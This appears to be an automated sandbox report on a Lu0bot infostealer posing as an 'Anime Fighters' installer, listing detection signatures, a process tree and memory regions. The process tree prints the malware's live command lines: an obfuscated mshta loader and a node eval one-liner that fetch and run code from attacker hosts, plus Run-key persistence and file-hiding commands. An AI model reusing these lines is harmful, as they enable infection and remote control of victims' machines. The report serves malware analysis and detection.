Resubmissions

02-09-2021 19:12

210902-xwla1aeefq 10

02-09-2021 19:09

210902-xtsbjabea9 8

Analysis

  • max time kernel
    606s
  • max time network
    609s
  • platform
    windows7_x64
  • resource
    win7-fr
  • submitted
    02-09-2021 19:12

General

  • Target

    Anime-Fighters-Infin_734316524.exe

  • Size

    3.9MB

  • MD5

    bd2b73492acf20dec004360b1605032d

  • SHA1

    60ddf3c107d94bbeb102a2d7ede945eb5edd2b35

  • SHA256

    12b6272825140a15eabec58f97b49aed3ce5db7816a0b3c2674f6ae8746367ca

  • SHA512

    dae236259e32a9e4b789f020dbd8082b376e3c2b56fd94523a44cf4b5a557f3661aeefc24b5605218ba0479ee1b9a8cb7b5c1df6c103673a99f13bc4210c90da

Malware Config

Signatures

  • Lu0bot

    Lu0bot is a lightweight infostealer written in NodeJS.

  • suricata: ET MALWARE lu0bot Loader HTTP Request

    suricata: ET MALWARE lu0bot Loader HTTP Request

  • suricata: ET MALWARE lu0bot Loader HTTP Response

    suricata: ET MALWARE lu0bot Loader HTTP Response

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 55 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 22 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 24 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • NTFS ADS 2 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Anime-Fighters-Infin_734316524.exe
    "C:\Users\Admin\AppData\Local\Temp\Anime-Fighters-Infin_734316524.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Users\Admin\AppData\Local\Temp\is-6LFA2.tmp\Anime-Fighters-Infin_734316524.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-6LFA2.tmp\Anime-Fighters-Infin_734316524.tmp" /SL5="$30106,3656070,140800,C:\Users\Admin\AppData\Local\Temp\Anime-Fighters-Infin_734316524.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1948
      • C:\Program Files (x86)\Vel\magnam\Expedita.exe
        "C:\Program Files (x86)\Vel/\magnam\Expedita.exe" 32cb7aca069a0c8bb8d51fccce1d3826
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1800
        • C:\Users\Admin\AppData\Local\Temp\arjPj5gZ\11zeb2.exe
          C:\Users\Admin\AppData\Local\Temp\arjPj5gZ\11zeb2.exe /usthree SUB=32cb7aca069a0c8bb8d51fccce1d3826
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1784
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{Dmp2-IBVR2-1m6P-tHF8g}\00731710590.exe"
            5⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2292
            • C:\Users\Admin\AppData\Local\Temp\{Dmp2-IBVR2-1m6P-tHF8g}\00731710590.exe
              "C:\Users\Admin\AppData\Local\Temp\{Dmp2-IBVR2-1m6P-tHF8g}\00731710590.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2324
              • C:\Windows\SysWOW64\mshta.exe
                mshta "javascript:document.write();0;y=unescape('%320%33%7E%68t%74p%3A%2F%2Fa%73u%310%2Ef%75n%2Fh%72i%2F%3F%321%616%654%62%7E%330').split('~');240;try{x='WinHttp';235;x=new ActiveXObject(x+'.'+x+'Request.5.1');239;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);72;x.send();82;y='ipt.S';78;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);196;}catch(e){};2;;window.close();"
                7⤵
                • Blocklisted process makes network request
                PID:2336
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1630610018286.txt & cscript /nologo /e:jscript get1630610018286.txt "http%3A%2F%2Fasu10.fun%2Fhri%2F%3F2cbc5f352%26b%3Dfe577fa7" node.cab & expand node.cab node.exe & del get1630610018286.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1630610018286.txt & cscript /nologo /e:jscript get1630610018286.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27cbc5f352%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu10.fun%27);s.send(b,0,b.length,19584,%27lu1.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1630610018286.txt
                  8⤵
                    PID:2428
                    • C:\Windows\SysWOW64\cscript.exe
                      cscript /nologo /e:jscript get1630610018286.txt "http%3A%2F%2Fasu10.fun%2Fhri%2F%3F2cbc5f352%26b%3Dfe577fa7" node.cab
                      9⤵
                      • Blocklisted process makes network request
                      PID:2460
                    • C:\Windows\SysWOW64\expand.exe
                      expand node.cab node.exe
                      9⤵
                      • Drops file in Windows directory
                      PID:2528
                    • C:\Windows\SysWOW64\cscript.exe
                      cscript /nologo /e:jscript get1630610018286.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27cbc5f352%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu10.fun%27);s.send(b,0,b.length,19584,%27lu1.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"
                      9⤵
                      • Loads dropped DLL
                      PID:2548
                      • C:\ProgramData\DNTException\node.exe
                        "C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27cbc5f352%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu10.fun%27);s.send(b,0,b.length,19584,%27lu1.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))
                        10⤵
                        • Executes dropped EXE
                        • Checks processor information in registry
                        • NTFS ADS
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2608
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c dir C:\
                          11⤵
                            PID:2684
                          • C:\Windows\SysWOW64\cacls.exe
                            cacls.exe C:\ProgramData\DNTException /t /e /c /g Everyone:F
                            11⤵
                              PID:2700
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls.exe C:\ProgramData\DNTException /t /c /grant *S-1-1-0:(f)
                              11⤵
                              • Modifies file permissions
                              PID:2716
                            • C:\Windows\SysWOW64\attrib.exe
                              attrib.exe +H C:\ProgramData\DNTException
                              11⤵
                              • Views/modifies file attributes
                              PID:2732
                            • C:\Windows\SysWOW64\attrib.exe
                              attrib.exe +H C:\ProgramData\DNTException\node.exe
                              11⤵
                              • Views/modifies file attributes
                              PID:2744
                            • C:\Windows\SysWOW64\tasklist.exe
                              tasklist /fo csv /nh
                              11⤵
                              • Enumerates processes with tasklist
                              PID:2296
                            • C:\Windows\SysWOW64\Wbem\wmic.exe
                              wmic process get processid,parentprocessid,name,executablepath /format:csv
                              11⤵
                                PID:2360
                              • C:\Windows\SysWOW64\ipconfig.exe
                                ipconfig.exe /all
                                11⤵
                                • Gathers network information
                                PID:2364
                              • C:\Windows\SysWOW64\route.exe
                                route.exe print
                                11⤵
                                  PID:2388
                                • C:\Windows\SysWOW64\netstat.exe
                                  netstat.exe -ano
                                  11⤵
                                  • Gathers network information
                                  PID:2520
                                • C:\Windows\SysWOW64\systeminfo.exe
                                  systeminfo.exe /fo csv
                                  11⤵
                                  • Gathers system information
                                  PID:2484
                                • C:\Windows\SysWOW64\cacls.exe
                                  cacls.exe C:\ProgramData\Intel /t /e /c /g Everyone:F
                                  11⤵
                                    PID:6924
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls.exe C:\ProgramData\Intel /t /c /grant *S-1-1-0:(f)
                                    11⤵
                                    • Modifies file permissions
                                    PID:6940
                                  • C:\Windows\SysWOW64\attrib.exe
                                    attrib.exe +H C:\ProgramData\Intel
                                    11⤵
                                    • Views/modifies file attributes
                                    PID:6956
                                  • C:\Windows\SysWOW64\attrib.exe
                                    attrib.exe +H "C:\ProgramData\Intel\Intel(R) Management Engine Components"
                                    11⤵
                                    • Views/modifies file attributes
                                    PID:6968
                                  • C:\Windows\SysWOW64\attrib.exe
                                    attrib.exe +H "C:\ProgramData\Intel\Intel(R) Management Engine Components\Intel MEC 3611790753"
                                    11⤵
                                    • Views/modifies file attributes
                                    PID:6980
                                  • C:\Windows\SysWOW64\attrib.exe
                                    attrib.exe +H "C:\ProgramData\Intel\Intel(R) Management Engine Components\Intel MEC 2740857950"
                                    11⤵
                                    • Views/modifies file attributes
                                    PID:6992
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg.exe query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                    11⤵
                                    • Modifies registry key
                                    PID:7004
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg.exe add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Intel Management Engine Components 2489498475" /t REG_SZ /d "wscript.exe /t:30 /nologo /e:jscript \"C:\ProgramData\Intel\Intel(R) Management Engine Components\Intel MEC 2740857950\" \"C:\ProgramData\Intel\Intel(R) Management Engine Components\" 1971215467" /f
                                    11⤵
                                    • Adds Run key to start application
                                    • Modifies registry key
                                    PID:7016
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{Dmp2-IBVR2-1m6P-tHF8g}\00096575022.exe" /us
                        5⤵
                        • Loads dropped DLL
                        PID:2760
                        • C:\Users\Admin\AppData\Local\Temp\{Dmp2-IBVR2-1m6P-tHF8g}\00096575022.exe
                          "C:\Users\Admin\AppData\Local\Temp\{Dmp2-IBVR2-1m6P-tHF8g}\00096575022.exe" /us
                          6⤵
                          • Executes dropped EXE
                          • Checks processor information in registry
                          PID:2788
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
                        5⤵
                        • Loads dropped DLL
                        PID:2820
                        • C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
                          "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:2856
                          • C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
                            "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Modifies system certificate store
                            PID:3028
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im "11zeb2.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\arjPj5gZ\11zeb2.exe" & exit
                        5⤵
                          PID:2848
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im "11zeb2.exe" /f
                            6⤵
                            • Kills process with taskkill
                            PID:2908
                      • C:\Users\Admin\AppData\Local\Temp\ZypDsIsW\99DEaZ.exe
                        C:\Users\Admin\AppData\Local\Temp\ZypDsIsW\99DEaZ.exe /qn CAMPAIGN="642"
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Enumerates connected drives
                        • Modifies system certificate store
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of WriteProcessMemory
                        PID:2028
                        • C:\Windows\SysWOW64\msiexec.exe
                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=642 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ZypDsIsW\99DEaZ.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ZypDsIsW\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630350905 /qn CAMPAIGN=""642"" " CAMPAIGN="642"
                          5⤵
                            PID:1992
                  • C:\Windows\system32\AUDIODG.EXE
                    C:\Windows\system32\AUDIODG.EXE 0x510
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1840
                  • C:\Windows\system32\msiexec.exe
                    C:\Windows\system32\msiexec.exe /V
                    1⤵
                    • Enumerates connected drives
                    • Drops file in Program Files directory
                    • Drops file in Windows directory
                    • Modifies data under HKEY_USERS
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:1328
                    • C:\Windows\syswow64\MsiExec.exe
                      C:\Windows\syswow64\MsiExec.exe -Embedding DCADC1DE714E03277D81DFBAD02E8559 C
                      2⤵
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1108
                    • C:\Windows\syswow64\MsiExec.exe
                      C:\Windows\syswow64\MsiExec.exe -Embedding 71DB86C4F55524A76312D0918EE9816C
                      2⤵
                      • Blocklisted process makes network request
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:1780
                      • C:\Windows\SysWOW64\taskkill.exe
                        "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                        3⤵
                        • Kills process with taskkill
                        PID:1320
                    • C:\Windows\syswow64\MsiExec.exe
                      C:\Windows\syswow64\MsiExec.exe -Embedding D07B761C8FFC99D9B2186E8931BBDCD7 M Global\MSI0000
                      2⤵
                      • Loads dropped DLL
                      PID:1148
                  • C:\Windows\system32\taskeng.exe
                    taskeng.exe {C78CA84D-10D3-476E-853E-7EDD5FB3E37F} S-1-5-18:NT AUTHORITY\System:Service:
                    1⤵
                    • Loads dropped DLL
                    PID:2648
                    • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                      "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
                      2⤵
                      • Executes dropped EXE
                      PID:2712
                    • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                      "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                      2⤵
                      • Executes dropped EXE
                      PID:2736
                    • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                      "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
                      2⤵
                      • Executes dropped EXE
                      PID:2772
                    • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                      "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
                      2⤵
                      • Executes dropped EXE
                      PID:2760
                    • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                      "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
                      2⤵
                      • Executes dropped EXE
                      PID:4204
                    • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                      "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
                      2⤵
                      • Executes dropped EXE
                      PID:5852

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • memory/1328-90-0x000007FEFC521000-0x000007FEFC523000-memory.dmp

                    Filesize

                    8KB

                  • memory/1784-89-0x0000000000400000-0x0000000002B5E000-memory.dmp

                    Filesize

                    39.4MB

                  • memory/1784-88-0x0000000000220000-0x0000000000268000-memory.dmp

                    Filesize

                    288KB

                  • memory/1800-71-0x00000000002E0000-0x00000000002E1000-memory.dmp

                    Filesize

                    4KB

                  • memory/1800-70-0x0000000000400000-0x00000000019C2000-memory.dmp

                    Filesize

                    21.8MB

                  • memory/1800-73-0x0000000005450000-0x0000000005452000-memory.dmp

                    Filesize

                    8KB

                  • memory/1948-63-0x0000000000240000-0x0000000000241000-memory.dmp

                    Filesize

                    4KB

                  • memory/1948-64-0x0000000075151000-0x0000000075153000-memory.dmp

                    Filesize

                    8KB

                  • memory/1992-62-0x0000000000400000-0x000000000042D000-memory.dmp

                    Filesize

                    180KB

                  • memory/1992-53-0x0000000076A81000-0x0000000076A83000-memory.dmp

                    Filesize

                    8KB

                  • memory/2028-86-0x0000000000220000-0x0000000000277000-memory.dmp

                    Filesize

                    348KB

                  • memory/2608-159-0x000000002D000000-0x000000002D001000-memory.dmp

                    Filesize

                    4KB

                  • memory/2608-163-0x0000000036000000-0x0000000036001000-memory.dmp

                    Filesize

                    4KB

                  • memory/2608-162-0x0000000035700000-0x0000000035701000-memory.dmp

                    Filesize

                    4KB

                  • memory/2608-161-0x0000000007D00000-0x0000000007D01000-memory.dmp

                    Filesize

                    4KB

                  • memory/2608-160-0x000000002C600000-0x000000002C601000-memory.dmp

                    Filesize

                    4KB

                  • memory/2608-158-0x000000003D700000-0x000000003D701000-memory.dmp

                    Filesize

                    4KB

                  • memory/2788-180-0x0000000000400000-0x0000000002BBA000-memory.dmp

                    Filesize

                    39.7MB

                  • memory/2788-179-0x00000000043A0000-0x000000000448B000-memory.dmp

                    Filesize

                    940KB

                  • memory/2856-182-0x0000000000710000-0x000000000072C000-memory.dmp

                    Filesize

                    112KB

                  • memory/2856-176-0x0000000001330000-0x0000000001331000-memory.dmp

                    Filesize

                    4KB

                  • memory/2856-181-0x0000000004CF0000-0x0000000004CF1000-memory.dmp

                    Filesize

                    4KB

                  • memory/3028-185-0x0000000000400000-0x000000000046C000-memory.dmp

                    Filesize

                    432KB

                  • memory/3028-190-0x00000000012D5000-0x00000000012E6000-memory.dmp

                    Filesize

                    68KB

                  • memory/3028-189-0x00000000012D0000-0x00000000012D1000-memory.dmp

                    Filesize

                    4KB

                  • memory/3028-187-0x0000000000470000-0x0000000000471000-memory.dmp

                    Filesize

                    4KB

                  • memory/3028-183-0x0000000000400000-0x000000000046C000-memory.dmp

                    Filesize

                    432KB